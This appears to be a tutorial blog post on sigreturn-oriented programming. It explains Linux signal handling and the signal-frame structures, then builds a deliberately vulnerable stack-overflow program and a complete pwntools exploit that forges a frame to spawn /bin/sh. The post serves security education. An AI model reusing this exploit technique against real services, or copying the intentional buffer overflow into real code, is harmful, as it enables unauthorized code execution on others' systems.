Sigreturn Oriented Programming

Over the years, many techniques have emerged that exploit mechanisms built into software. One of them abuses the signal handling routine of Unix-based operating systems to gain arbitrary code execution.

In this post, I cover the technique known as sigreturn oriented programming, along with the properties that allow us to construct a weird machine with it. I will elaborate on both the term and the technique later in this post, but first we need a fundamental understanding of what signals are and how they are implemented on Unix-based systems.

Signal Handling

So what are signals, how do they work and what purpose do they serve?

We can think of signals as a limited form of interprocess communication for events and requests. A signal is a software interrupt that is delivered asynchronously to a process to indicate a specific event.

An important distinction is how limited signals are compared to other forms of IPC: a signal carries almost no data of its own, so we can think of each one as a flag that indicates an event or requests a behavior. We can also register our own signal handler programmatically, which lets us run our own callback when the signal arrives.
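As a minimal sketch of such a callback, the following Python snippet installs a handler for SIGUSR1 and then sends that signal to its own process. The names on_usr1 and received are illustrative. Keep in mind that Python runs its handlers from the interpreter loop rather than directly on the kernel's signal frame, so this only illustrates the programming model, not the low level mechanics covered later.

```python
import os
import signal

received = []  # signal numbers seen by the handler (illustrative name)

def on_usr1(signum, frame):
    # Invoked by the interpreter once the signal has been delivered.
    received.append(signum)

# Install the handler and remember the previous disposition.
previous = signal.signal(signal.SIGUSR1, on_usr1)

# Send SIGUSR1 to ourselves; the callback runs before we carry on.
os.kill(os.getpid(), signal.SIGUSR1)

# Restore the earlier disposition (None means it was not set from Python).
signal.signal(signal.SIGUSR1, previous if previous is not None else signal.SIG_DFL)
```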

The following is a list of the signals described in signal(7), along with the standard that specifies each one (P1990 is POSIX.1-1990, P2001 is POSIX.1-2001, and a dash means the signal is not part of POSIX), its default action, and a brief description. It's not important to know each of these, but it's good to keep a reference in case one of these signals is encountered. This section is from the man page of signal(7).

Manual page signal(7)

Signal      Standard   Action   Comment
────────────────────────────────────────────────────────────────────────
SIGABRT      P1990      Core    Abort signal from abort(3)
SIGALRM      P1990      Term    Timer signal from alarm(2)
SIGBUS       P2001      Core    Bus error (bad memory access)
SIGCHLD      P1990      Ign     Child stopped or terminated
SIGCLD         -        Ign     A synonym for SIGCHLD
SIGCONT      P1990      Cont    Continue if stopped
SIGEMT         -        Term    Emulator trap
SIGFPE       P1990      Core    Floating-point exception
SIGHUP       P1990      Term    Hangup detected on controlling terminal
                               or death of controlling process
SIGILL       P1990      Core    Illegal Instruction
SIGINFO        -                A synonym for SIGPWR
SIGINT       P1990      Term    Interrupt from keyboard
SIGIO          -        Term    I/O now possible (4.2BSD)
SIGIOT         -        Core    IOT trap. A synonym for SIGABRT
SIGKILL      P1990      Term    Kill signal
SIGLOST        -        Term    File lock lost (unused)
SIGPIPE      P1990      Term    Broken pipe: write to pipe with no
                               readers; see pipe(7)
SIGPOLL      P2001      Term    Pollable event (Sys V);
                               synonym for SIGIO
SIGPROF      P2001      Term    Profiling timer expired
SIGPWR         -        Term    Power failure (System V)
SIGQUIT      P1990      Core    Quit from keyboard
SIGSEGV      P1990      Core    Invalid memory reference
SIGSTKFLT      -        Term    Stack fault on coprocessor (unused)
SIGSTOP      P1990      Stop    Stop process
SIGTSTP      P1990      Stop    Stop typed at terminal
SIGSYS       P2001      Core    Bad system call (SVr4);
                               see also seccomp(2)
SIGTERM      P1990      Term    Termination signal
SIGTRAP      P2001      Core    Trace/breakpoint trap
SIGTTIN      P1990      Stop    Terminal input for background process
SIGTTOU      P1990      Stop    Terminal output for background process
SIGUNUSED      -        Core    Synonymous with SIGSYS
SIGURG       P2001      Ign     Urgent condition on socket (4.2BSD)
SIGUSR1      P1990      Term    User-defined signal 1
SIGUSR2      P1990      Term    User-defined signal 2
SIGVTALRM    P2001      Term    Virtual alarm clock (4.2BSD)
SIGXCPU      P2001      Core    CPU time limit exceeded (4.2BSD);
                               see setrlimit(2)
SIGXFSZ      P2001      Core    File size limit exceeded (4.2BSD);
                               see setrlimit(2)
SIGWINCH       -        Ign     Window resize signal (4.3BSD, Sun)

When we want to send a signal to a process, we utilize the system call kill.

As not all signals are meant to terminate a process, the name of the system call can be a bit confusing. The reason is that the kill system call was introduced during the early development of Unix, at which time the purpose of signals was primarily to kill processes.

Over time various other signals were added to Unix, and the name was retained for backwards compatibility with earlier versions.
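To make the point that kill does not necessarily kill anything, here is a small sketch in Python. The helper is_alive is a hypothetical name. It relies on two documented behaviors: signal number 0 performs only the existence and permission checks without delivering anything, and SIGURG has a default action of Ign according to the table above.

```python
import os
import signal

def is_alive(pid):
    """Return True if a process with this PID exists."""
    try:
        os.kill(pid, 0)  # signal 0: checks only, nothing is delivered
    except ProcessLookupError:
        return False
    except PermissionError:
        return True      # the process exists but belongs to another user
    return True

# The default action of SIGURG is to ignore it, so this does not terminate us.
os.kill(os.getpid(), signal.SIGURG)
still_running = is_alive(os.getpid())
```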

When the kernel delivers a signal, it must first perform a (signal) context-switch before it can execute the signal handler (this is not to be confused with the context-switch from user to kernel space due to the system call). The kernel will store the current state and context of the process and write it to the stack in the form of a runtime signal frame structure. We will explore this structure later on due to its relevance in the exploitation of the signal handling mechanism.

However, if the signal handler resides within user space, why is there a need for a context switch?

This is due to the fact that signals are asynchronous, meaning that we can't simply execute a signal handler like we would any other subroutine. A signal can arrive between any two instructions, so the interrupted state has to be saved at the point in time the signal is delivered and restored exactly afterwards.

Once the frame holding the execution context of the running process has been written to the stack, the process executes the signal handler. When the handler returns control to the process, the sigreturn system call is invoked, the context of the process is restored and execution continues.

A more detailed sequence of events is depicted as follows.

A signal is sent to a process via the kill system call, an interrupt or some other form of interprocess communication.
Before the process returns to user space, the kernel calls do_signal, which picks up the pending signal and performs its initial processing. Permission checks take place earlier, at the time the signal is sent.
The kernel then calls the function handle_signal, which determines how the signal should be handled. If the developer has registered a custom signal handler, the kernel prepares to call it. Otherwise it carries out the default action of the signal, which may be to terminate the process, dump core, stop or continue it, or ignore the signal (see the Action column above).
If a signal handler is registered, setup_frame is called. This function saves the current execution context of the process on the user space stack.
After this, the kernel transfers control flow to the signal handler. An important thing to keep in mind is that the handler runs in user mode within the same process environment. The kernel does not execute user land code in kernel mode: SMEP/SMAP would prevent it, and it would not make sense either.

Once the signal handler has finished executing, we need some mechanism which restores the previous execution context and resumes the running process. The following is a high level sequence of events which allows for this.

When a signal handler is finished executing, the system call sigreturn will be invoked.
A context switch is performed from user space into kernel space due to the system call. The kernel is now responsible for restoring the previous execution context stored on the user space stack.
Once the process state is restored, the kernel transfers control back to the process and resumes execution.

Signal Frame Structure

Let’s take a closer look at the exact structures involved in signal handling, more specifically struct rt_sigframe. This is the structure which contains the execution context of the interrupted process. The runtime signal frame is stored on the user land stack, which allows an attacker with enough control over the stack to forge a frame through maliciously crafted input.

The following is the definition of the runtime signal frame structure. Keep in mind that the structure is heavily architecture dependent. I will only be covering the structure for modern x86_64 Linux systems.

https://elixir.bootlin.com/linux/latest/source/arch/x86/include/asm/sigframe.h#L57

struct rt_sigframe {
	char __user *pretcode;
	struct ucontext uc;
	struct siginfo info;
	/* fp state follows here */
};

The first field for this structure is char __user *pretcode, which essentially holds the return address for the signal handler. Once the handler has finished executing, it will jump to the address present in this field. Keep in mind that the __user macro denotes an address in user space.

If we view the value at runtime, we can see that it is populated with the address of the symbol __restore_rt. The following is the disassembly of the function within libc.

pwndbg> x/2i 0x00007ffff7de6ab0
   0x7ffff7de6ab0 <__restore_rt>:       mov    rax,0xf
   0x7ffff7de6ab7 <__restore_rt+7>:     syscall
pwndbg>

The code stub simply invokes the sigreturn system call. When the signal handler returns, it will execute sigreturn to restore and resume execution context for the running process. As previously explained, sigreturn will be responsible for this operation.
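Because the stub is just two instructions, it can be located by searching for its byte encoding. The following sketch assumes the encoding that matches the disassembly above (a 7 byte mov rax, 0xf followed by the 2 byte syscall). The names SIGRETURN_STUB and find_stub are illustrative, and the input is a synthetic byte string rather than a real binary.

```python
# Encoding of the stub shown above on x86_64:
#   48 c7 c0 0f 00 00 00   mov rax, 0xf
#   0f 05                  syscall
SIGRETURN_STUB = bytes.fromhex("48c7c00f000000" "0f05")

def find_stub(blob, base=0):
    """Return the virtual address of every occurrence of the stub in blob."""
    hits = []
    pos = blob.find(SIGRETURN_STUB)
    while pos != -1:
        hits.append(base + pos)
        pos = blob.find(SIGRETURN_STUB, pos + 1)
    return hits

# Synthetic example: 16 NOP bytes, the stub, then a ret.
demo = b"\x90" * 16 + SIGRETURN_STUB + b"\xc3"
addresses = find_stub(demo, base=0x401000)
```

In practice, blob would be the contents of an executable segment and base its load address.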

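The next field, struct ucontext uc, expands into the following structure. Note that the linked listing is the Alpha variant; the generic definition used on x86_64 has the same fields without uc_osf_sigmask.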

https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/asm/ucontext.h#L5

#ifndef _ASMAXP_UCONTEXT_H
#define _ASMAXP_UCONTEXT_H

struct ucontext {
	unsigned long	  uc_flags;
	struct ucontext  *uc_link;
	old_sigset_t	  uc_osf_sigmask;
	stack_t		  uc_stack;
	struct sigcontext uc_mcontext;
	sigset_t	  uc_sigmask;	/* mask last for extensibility */
};

#endif /* !_ASMAXP_UCONTEXT_H */

This structure stores the user context for the running process. The following is a brief description for each of the structure fields.

struct ucontext
- uc_flags: stores flags which indicate the current status of the execution context.
- uc_link: pointer to an execution context which should be resumed when the current context completes, used for context switching and thread scheduling.
- uc_osf_sigmask: an Alpha specific legacy signal mask kept for OSF/1 compatibility; this field does not exist on x86_64. The collection of signals which are currently blocked is known as the signal mask.
- uc_stack: describes the alternate signal stack (see sigaltstack(2)) associated with the saved context.
- uc_mcontext: this structure contains a machine architecture specific snapshot of the execution context.
- uc_sigmask: the signal mask of the saved context, which is reinstated when the context is restored.
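The notion of a signal mask can be observed from user space. The sketch below uses Python's signal.pthread_sigmask to block SIGUSR1, read the mask back, and then put the original mask in place again, which is loosely analogous to what happens with uc_sigmask when a saved context is restored. The variable names are illustrative.

```python
import signal

# Block SIGUSR1 in the calling thread; the call returns the previous mask.
old_mask = signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGUSR1})

# Blocking an empty set changes nothing and returns the current mask.
current_mask = signal.pthread_sigmask(signal.SIG_BLOCK, set())

# Reinstate the original mask and read it back once more.
signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)
restored_mask = signal.pthread_sigmask(signal.SIG_BLOCK, set())
```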

Let’s take a look at this structure at runtime and examine each of its fields.

pwndbg> p *(struct ucontext_t*) 0x7fffffffd680
$10 = {
  uc_flags = 7,
  uc_link = 0x0,
  uc_stack = {
    ss_sp = 0x0,
    ss_flags = 2,
    ss_size = 0
  },
  uc_mcontext = {
    gregs = {140737488346224, 140737353936240, 8, 514, 0,
      140737488346712, 140737354125312, 93824992247256, 2,
      140737488345728, 140737488346416, 140737488346696, 0, 0,
      140737351936899, 140737488346400, 93824992235913, 518,
      12103423998558259, 0, 3, 0, 0},
    fpregs = 0x7fffffffd840,
    __reserved1 = {3, 140733193388032, 140737488345096,140737488345092,
      0, 0, 140737353919659, 4160530904}
  },
  uc_sigmask = {
    __val = {0, 140737488345304, 93824992232647, 140737354131016,
      140737353708968, 140737354130112,
      466005475, 140737488345344, 140737353958056, 1, 140737353708968,
      1, 0, 1, 140737354130112, 140737354131016}
  },
  __fpregs_mem = {
    cwd = 55416,
    swd = 65535,
    ftw = 32767,
    fop = 0,
    rip = 140733193388033,
    rdp = 140737488345216,
    mxcsr = 895,
    mxcr_mask = 0,
    _st = {{
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {8064, 0, 65535, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }, {
        significand = {0, 0, 0, 0},
        exponent = 0,
        __glibc_reserved1 = {0, 0, 0}
      }},
    _xmm = {{
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {896, 896, 896, 896}
      }, {
        element = {2, 0, 14, 2147483648}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }, {
        element = {0, 0, 0, 0}
      }},
    __glibc_reserved1 = {0, 0, 0, 0, 0, 0,
      4294957584, 32767, 4160572646, 32767, 4158322872, 32767,
      4160694051, 32767, 4160319488, 32767, 110527148, 0, 1179670611,
      1092, 31, 0, 1088, 0}
  },
  __ssp = {0, 0, 0, 3}
}

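The bulk of the user context is held within the field struct sigcontext uc_mcontext, which stores the saved registers and execution state. What follows is a definition of the structure. Note that the linked listing is the Alpha variant; on x86_64 the structure instead holds the general purpose registers r8 through r15, rdi, rsi, rbp, rbx, rdx, rax, rcx, rsp and rip, followed by eflags, the segment selectors, err, trapno, oldmask, cr2 and the fpstate pointer, as the debugger output further down shows.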

https://elixir.bootlin.com/linux/latest/source/arch/alpha/include/uapi/asm/sigcontext.h#L5

#ifndef _ASMAXP_SIGCONTEXT_H
#define _ASMAXP_SIGCONTEXT_H

struct sigcontext {
	/*
	 * What should we have here? I'd probably better use the same
	 * stack layout as OSF/1, just in case we ever want to try
	 * running their binaries.. 
	 *
	 * This is the basic layout, but I don't know if we'll ever
	 * actually fill in all the values..
	 */
	 long		sc_onstack;
	 long		sc_mask;
	 long		sc_pc;
	 long		sc_ps;
	 long		sc_regs[32];
	 long		sc_ownedfp;
	 long		sc_fpregs[32];
	 unsigned long	sc_fpcr;
	 unsigned long	sc_fp_control;
	 unsigned long	sc_reserved1, sc_reserved2;
	 unsigned long	sc_ssize;
	 char *		sc_sbase;
	 unsigned long	sc_traparg_a0;
	 unsigned long	sc_traparg_a1;
	 unsigned long	sc_traparg_a2;
	 unsigned long	sc_fp_trap_pc;
	 unsigned long	sc_fp_trigger_sum;
	 unsigned long	sc_fp_trigger_inst;
};


#endif

Keep in mind that the implementation of this structure (as well as various others) differs between platforms and architectures to meet their specific requirements.

Let’s take a look at this structure at runtime to view the specific contents of each saved register.

pwndbg> p*(struct sigcontext *)(*(struct ucontext_t*)0x7fffffffd680).uc_mcontext
$9 = {
  r8 = 0,
  r9 = 0,
  r10 = 3849470367813,
  r11 = 3848290698112,
  r12 = 3848290698112,
  r13 = 3848290698112,
  r14 = 3848290698112,
  r15 = 3848290698112,
  rdi = 3848290698112,
  rsi = 3848290698112,
  rbp = 2,
  rbx = 9223372036854775822,
  rdx = 0,
  rax = 0,
  rcx = 0,
  rsp = 0,
  rip = 0,
  eflags = 0,
  cs = 0,
  gs = 0,
  fs = 0,
  __pad0 = 0,
  err = 3216465788709089792,
  trapno = 1,
  oldmask = 93824992235913,
  cr2 = 140737488346696,
  {
    fpstate = 0x1f7ffdab0,
    __fpstate_word = 8455707312
  },
  __reserved1 = {1, 140737351845968, 140737488346672,
    93824992235878, 5726617664, 140737488346696,
    140737488346696, 10445461255472785543}
}
pwndbg>
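To make the register layout easier to work with, the field order printed above can be modeled with ctypes, which then computes the byte offset of each saved register. This is a sketch under the assumption that every register slot is 8 bytes wide and the four segment selectors are 16 bits each. SigContext is a hypothetical name, and the slot I call ss is the one the debugger prints as __pad0.

```python
import ctypes

class SigContext(ctypes.Structure):
    """Assumed x86_64 layout, following the field order in the debugger output."""
    _fields_ = (
        [(name, ctypes.c_uint64) for name in (
            "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
            "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp",
            "rip", "eflags")]
        # Four 16-bit selectors share a single 8-byte slot.
        + [(name, ctypes.c_uint16) for name in ("cs", "gs", "fs", "ss")]
        + [(name, ctypes.c_uint64) for name in (
            "err", "trapno", "oldmask", "cr2", "fpstate")]
        + [("reserved1", ctypes.c_uint64 * 8)]
    )

# Byte offset of every field, relative to the start of uc_mcontext.
offsets = {name: getattr(SigContext, name).offset
           for name, _ in SigContext._fields_}
```

With these assumptions, offsets["rip"] tells us where inside uc_mcontext the saved instruction pointer lives, which is the slot a forged frame needs to control.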

Now let’s view the last field present within the runtime signal frame, struct siginfo info. This field holds various information about the signal which was delivered to the process. The following is the expanded definition of the structure.

typedef struct siginfo {
  union {
    struct {
      int si_signo;
      int si_errno;
      int si_code;
      union __sifields _sifields;
    };
    int _si_pad[SI_MAX_SIZE/sizeof(int)];
  };
} __attribute__((aligned(8))) siginfo_t;

The first field si_signo holds the signal number or type which the signal represents. The next field si_errno may potentially hold an error code if the signal was generated due to an error condition. The field si_code provides additional information about the specific event which triggered the signal. The usage of this field depends on the type of signal.

The field _sifields is a union which typically contains information such as the sender’s process and user identifier. I will not be expanding on this structure as it's not relevant here.
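These fields can be inspected without writing any C. The sketch below, which assumes Linux, blocks SIGUSR1, sends it to the current thread so that it stays pending, and then collects it with signal.sigtimedwait, which returns an object exposing si_signo, si_code, si_errno, si_pid and si_uid. The variable names are illustrative.

```python
import os
import signal
import threading

# Block SIGUSR1 so that it stays pending instead of triggering its action.
old_mask = signal.pthread_sigmask(signal.SIG_BLOCK, {signal.SIGUSR1})
try:
    # Direct the signal at the current thread, where it is blocked.
    signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
    # Dequeue the pending signal with its siginfo (1 second timeout).
    info = signal.sigtimedwait({signal.SIGUSR1}, 1.0)
finally:
    signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)

# si_pid identifies the sender, which in this case is our own process.
sender_is_us = info is not None and info.si_pid == os.getpid()
```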

Sigreturn Oriented Programming

The technique known as SROP exploits two properties of the signal handling mechanism: the execution context is stored on the user space stack, and the kernel has no means of verifying whether a runtime signal frame is legitimate.

Thanks to this, an attacker with enough control over the stack can forge a malicious runtime signal frame for the kernel to load. The one hard requirement is the ability to invoke the sigreturn system call, which we can achieve via several means.

One such method is return oriented programming. If there is a syscall ROP gadget present within the binary and we can control the rax register, we can set rax to 15 (0xf) and leverage the gadget to invoke sigreturn.
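A rough sketch of what such a chain could look like is shown below. The address of the pop rax gadget is hypothetical, and the syscall address is simply the one used by the exploit later in this post. One detail worth noting is that the frame passed in here starts at uc_flags: when the syscall instruction executes, the stack pointer already sits just past the gadget address, and the kernel expects the ucontext to begin there.

```python
import struct

def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)

SYS_RT_SIGRETURN = 15   # x86_64 system call number (0xf)

POP_RAX_RET = 0x401234  # hypothetical gadget: pop rax ; ret
SYSCALL = 0x4011b8      # syscall gadget address used later in this post

def sigreturn_chain(frame):
    """Set rax to 15, execute syscall, and leave frame on the stack."""
    return p64(POP_RAX_RET) + p64(SYS_RT_SIGRETURN) + p64(SYSCALL) + frame

# Placeholder bytes stand in for a real forged frame.
chain = sigreturn_chain(b"F" * 304)
```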

On older versions of Linux, there also exists a syscall gadget usable for invoking sigreturn at a fixed address in the vsyscall page. The kernel mapped this page into every user space process as an optimization for certain system calls. This mechanism has since been deprecated in favor of the vDSO, which is mapped at a randomized address.

Using this technique, we can leverage the signal handling routine to populate each and every register with whatever value we want. The following is a vulnerable program which we will exploit using SROP.

// gcc -w -static -no-pie -fno-stack-protector -o vuln vuln.c
#include <stdio.h>
#include <unistd.h>

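// Reads up to 1024 bytes into a buffer that only holds 128: stack overflow.
int foo(char* buffer) {
  return read(0, buffer, 1024);
}

int main(int argc, char** argv) {
  char buffer[128];
  printf("Bytes read into buffer: %d\n", foo((char *)&buffer));
  // This string conveniently places "/bin/sh" in .rodata.
  puts("Good luck on calling /bin/sh");
  return 0;
}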

For the sake of simplicity, we will compile the binary statically and without position independent code (PIE). Static linking places the __restore_rt stub, which would typically live in libc, inside the binary itself, and disabling PIE keeps both the stub and the /bin/sh string at fixed addresses. This makes the example much easier to comprehend and work with, as we won't have to worry about gaining leaks and calculating offsets.

We will also disable the stack canary, as we need to be able to write over the stack to forge our fake runtime signal frame. Keep in mind that we don't actually need to send a signal. We can just craft a fake frame and then invoke sigreturn, which replaces the current execution context with the one in our fake signal frame.

The last little cheat that the program provides us is the /bin/sh\x00 string. As this string is no longer present in recent versions of statically compiled binaries, using a string within .rodata is much easier than having to write our own to a known writable region of memory.

What follows is the high level sequence of events taken to gain a shell on the binary.

Calculate the offset of the return address from the start of the buffer.
Find the addresses we need, specifically the /bin/sh string, the restore_rt symbol for our return address and a syscall gadget for the instruction pointer.
Craft a fake signal frame which populates the registers with the appropriate arguments to spawn a shell with execve.
Craft the final payload from the padding and the forged runtime signal frame.

First and foremost, let's calculate the offset of the return address.

─────────────────────────────[ BACKTRACE ]─────────────────────────────
 ► f 0         0x401838 main+79
   f 1 0x6161616161616172
   f 2 0x6161616161616173
   f 3 0x6161616161616174
   f 4 0x6161616161616175
   f 5 0x6161616161616176
   f 6 0x6161616161616177
   f 7 0x6161616161616178
───────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l raaaaaaa
Finding cyclic pattern of 8 bytes: b'raaaaaaa' (hex: 0x7261616161616161)
Found at offset 136
pwndbg>

So now we know that the offset is 136 bytes, and the return address sits directly after this. From here, we need some means of invoking the sigreturn system call. Thankfully we have the __restore_rt symbol statically linked within the binary itself, so we can use that as our gadget. Keep in mind that the first field of the signal frame, pretcode, effectively serves as the return address.
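As a quick sanity check on that number, the overwritten value from the backtrace can be decoded by hand. The sketch below assumes the usual stack layout for main when there is no canary: the 128 byte buffer, then the saved rbp, then the return address. The variable names are illustrative.

```python
# Value found in the return address slot (frame 1 in the backtrace above).
overwritten = 0x6161616161616172

# x86_64 is little-endian, so in memory these bytes read "raaaaaaa".
pattern = overwritten.to_bytes(8, "little")

# Assumed layout of main's stack frame: buffer, saved rbp, return address.
BUFFER_SIZE = 128
SAVED_RBP_SIZE = 8
expected_offset = BUFFER_SIZE + SAVED_RBP_SIZE
```

Under that assumption the arithmetic agrees with the offset reported by cyclic.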

From here we can populate the signal frame with whatever values we want. In this case, we want to call execve("/bin/sh", 0, 0). Once the registers are populated with the correct values, we still need to execute a syscall instruction to perform the execve, which is why the rip field in the frame points at a syscall gadget.

When forging a fake signal frame, we need to be careful not to populate fields with bad values which may corrupt the runtime of our process. There are a few requirements for a valid frame, which are as follows.

The code segment (CS) register must be correctly restored, on x86_64 this register contains the value 0x33.
The fpstate field should not point to a random pointer and should be null. When this field is null, Linux will assume no floating point operations and will clear the FPU state.

The rest of the fields that were not mentioned were populated with the values shown at runtime by the debugger.
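The requirements above can be captured in a small helper that packs the frame from named registers. This is a sketch built on the x86_64 layout discussed earlier, not a tested replacement for the exploit: build_frame is a hypothetical name, the output starts at uc_flags (pretcode is not included), and every field not mentioned above is simply zeroed rather than copied from the debugger.

```python
import struct

def build_frame(rax, rdi, rsi, rdx, rip, rsp=0):
    """Pack an x86_64 ucontext (starting at uc_flags) for sigreturn."""
    regs = dict.fromkeys(
        ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
         "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip"], 0)
    regs.update(rax=rax, rdi=rdi, rsi=rsi, rdx=rdx, rip=rip, rsp=rsp)

    frame = struct.pack("<5Q", 0, 0, 0, 0, 0)      # uc_flags, uc_link, uc_stack
    frame += struct.pack("<17Q", *regs.values())   # r8 .. rip, in frame order
    frame += struct.pack("<Q", 0x202)              # eflags
    frame += struct.pack("<4H", 0x33, 0, 0, 0x2b)  # cs, gs, fs, ss
    frame += struct.pack("<5Q", 0, 0, 0, 0, 0)     # err, trapno, oldmask, cr2, fpstate (null)
    frame += struct.pack("<9Q", *([0] * 9))        # __reserved1[8], uc_sigmask
    return frame

# execve("/bin/sh", NULL, NULL): rax = 59, rdi = address of the string.
frame = build_frame(rax=59, rdi=0x475020 + 21, rsi=0, rdx=0, rip=0x4011b8)
```

Naming the registers keeps the call site readable, and packing them in dictionary order relies on Python preserving insertion order (3.7 and later).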

The full exploit code is shown below.

#!/usr/bin/env python3
from pwn import *

p = ELF('vuln', checksec=0).process(env={})

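# Addresses taken from the statically linked, non-PIE binary
bin_sh = 0x00475020+21 # "/bin/sh" begins 21 bytes into the puts() string
restore_rt = 0x00462170 # __restore_rt: mov rax, 0xf; syscall
syscall = 0x00000000004011b8 # syscall gadget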

sigframe = p64(restore_rt) # pretcode (return address)
sigframe += p64(0x0000000000000007) # uc_flags
sigframe += p64(0) # uc_link
sigframe += p64(0) # uc_stack.ss_sp
sigframe += p64(0x0000ffff00000000) # uc_stack.ss_flags
sigframe += p64(0) # uc_stack.ss_size
sigframe += p64(0)*8 # r8-r15
sigframe += p64(bin_sh) # rdi
sigframe += p64(0) # rsi
sigframe += p64(0) # rbp
sigframe += p64(0) # rbx
sigframe += p64(0) # rdx
sigframe += p64(59) # rax
sigframe += p64(0) # rcx
sigframe += p64(0) # rsp
sigframe += p64(syscall) # rip
sigframe += p64(0x0000000000000202) # eflags
sigframe += p64(0x002b000000000033) # cs=0x33, gs=0, fs=0, ss=0x2b
sigframe += p64(0) # err
sigframe += p64(1) # trapno
sigframe += p64(0)*3 # oldmask, cr2, fpstate (must be null)
sigframe += p64(0xe) # __reserved1[0]
sigframe += p64(0) # __reserved1[1]

offset=136
payload = b'A'*offset
payload += sigframe

pause()
p.send(payload)
p.interactive()

Conclusion

In summary, sigreturn oriented programming is a technique typically used to populate registers with the goal of arbitrary code execution, by forging a runtime signal frame and exploiting the signal handling mechanism on Unix-based systems.

Below is a list of additional resources which I used as a reference while writing this post. I highly recommend going through the original paper on this technique.

Thanks for reading!

Additional Resources

https://www.cs.vu.nl/~herbertb/papers/srop_sp14.pdf
https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf
https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
https://lwn.net/Articles/676803/